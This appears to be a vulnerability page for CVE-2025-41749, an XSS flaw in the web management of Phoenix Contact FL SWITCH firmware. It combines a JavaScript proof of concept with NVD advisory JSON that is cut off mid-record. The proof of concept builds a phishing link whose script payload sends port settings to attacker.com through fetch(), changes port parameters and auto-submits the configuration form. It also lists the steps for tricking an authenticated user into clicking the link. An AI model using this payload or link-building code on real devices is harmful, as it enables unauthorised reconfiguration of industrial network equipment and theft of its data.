CVE-2025-41749

// CVE-2025-41749 PoC - XSS in port_util.php // This PoC demonstrates how an attacker can inject malicious JavaScript // through port_util.php to manipulate WBM configuration parameters const pocUrl = 'http://[TARGET_IP]/port_util.php'; // Malicious payload that steals configuration data and modifies parameters const xssPayload = ` <script> // Steal current configuration const config = { portSettings: document.querySelectorAll('input[name*="port"]'), currentUrl: window.location.href }; // Exfiltrate data to attacker controlled server fetch('https://attacker.com/exfil?data=' + btoa(JSON.stringify(config))); // Modify port configuration parameters document.querySelector('input[name="port_num"]').value = '9999'; document.querySelector('input[name="port_enabled"]').checked = false; // Auto-submit the form document.querySelector('form[action*="port_util"]').submit(); </script> `; // Generate malicious link for social engineering attack function generateMaliciousLink() { const baseUrl = pocUrl; const params = new URLSearchParams({ port_id: '1' + xssPayload, action: 'edit' }); return `${baseUrl}?${params.toString()}`; } // Display the malicious link console.log('Malicious Link for Social Engineering Attack:'); console.log(generateMaliciousLink()); console.log('\nAttack Steps:'); console.log('1. Send this link to authenticated WBM user'); console.log('2. When user clicks, XSS payload executes in their browser'); console.log('3. Attacker can modify device configuration parameters'); console.log('4. Modified configuration is saved to the device');

{"cve": {"id": "CVE-2025-41749", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:50.230", "lastModified": "2025-12-19T16:46:12.343", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An XSS vulnerability in port_util.php can be used by an unauthenticated remote attacker to trick an authenticated user to click on the link provided by the attacker in order to change parameters available via web based management (WBM). The vulnerability does not provide access to system-level resources such as operating system internals or privileged functions. Access is limited to device configuration parameters that are available in the context of the web application. The session cookie is secured by the httpOnly Flag. Therefore an attacker is not able to take over the session of an authenticated user."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2008f_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "DBFA9AC1-51A3-4516-81E9-8044EFB9E436"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2008f:-:*:*:*:*:*:*:*", "matchCriteriaId": "8D3F1820-AF71-4D9A-BC63-1B886C739FD0"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2016_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "E2224C43-207D-4E66-96CE-7994EA2F0C6B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2016:-:*:*:*:*:*:*:*", "matchCriteriaId": "5C4DFBF9-2A05-4888-B457-E29617B74C95"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2105_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "4E7EF0AD-28B3-4085-B631-EDD603BCAC37"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2105:-:*:*:*:*:*:*:*", "matchCriteriaId": "B7A15734-B479-4E6F-923A-F838BDA51907"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2108_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "946C2D9E-B9AD-4F30-9486-9CF46A1678D4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2108:-:*:*:*:*:*:*:*", "matchCriteriaId": "D02E0265-C083-4434-A8A5-F886D8877CA6"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2116_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "22BB4729-7E6A-4D5B-A92C-E560482A6A6C"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2116:-:*:*:*:*:*:*:*", "matchCriteriaId": "AF61AD7B-F835-421B-BA94-375A3C5F5A22"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2204-2tc-2sfx_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "AE050F85-6AF2-4C75-BD8E-E1FA94327C35"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2204-2tc-2sfx:-:*:*:*:*:*:*:*", "matchCriteriaId": "360C4F7D-B4E8-4D7F-BFF5-AB7490AAD7F7"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2205_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "172C2878-FE3F-4CFE-8E22-BF20494DD9C7"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2205:-:*:*:*:*:*:*:*", "matchCriteriaId": "3B451A6F-C3D6-428B-B465-DED2FE4BFD3A"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:f ... (truncated)